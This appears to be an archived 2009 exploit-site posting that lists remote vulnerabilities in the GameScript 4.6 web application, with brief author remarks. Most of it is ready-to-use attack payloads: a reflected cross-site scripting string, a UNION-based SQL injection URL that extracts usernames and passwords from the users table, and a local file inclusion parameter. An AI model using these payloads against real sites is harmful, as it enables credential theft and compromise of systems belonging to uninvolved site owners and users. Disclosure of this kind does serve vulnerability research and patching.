[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : GameScript 4.6 (XSS/SQL/LFI) Multiple Remote Vulnerabilities
# Published : 2009-01-28
# Author : Encrypt3d.M!nd
# Previous Title : Chipmunk Blog (Auth Bypass) Add Admin Exploit
# Next Title : Gazelle CMS (template) Local File Inclusion Vulnerability


GameScript 4.6 Multiple Vulnerabillities
(Earlier versions might be affected)

By : Encrypt3d.M!nd

Demo :www.gsdemo.com
just bored  :) 
There are other vulnerabillities i think

Iam Iraqian...Not Arabian
###################################################

Xss :

/games.php?search="<script>alert(666);</script>


Sql injection :

/page.php?page=viewprofile&user=-Encrypt3d'%20union%20select%201,2,username,4,5,password,7,8,9,10,11,12%20from%20users/*

Local File Include :

/page.php?page=file_to_include

# www.Syue.com [2009-01-28]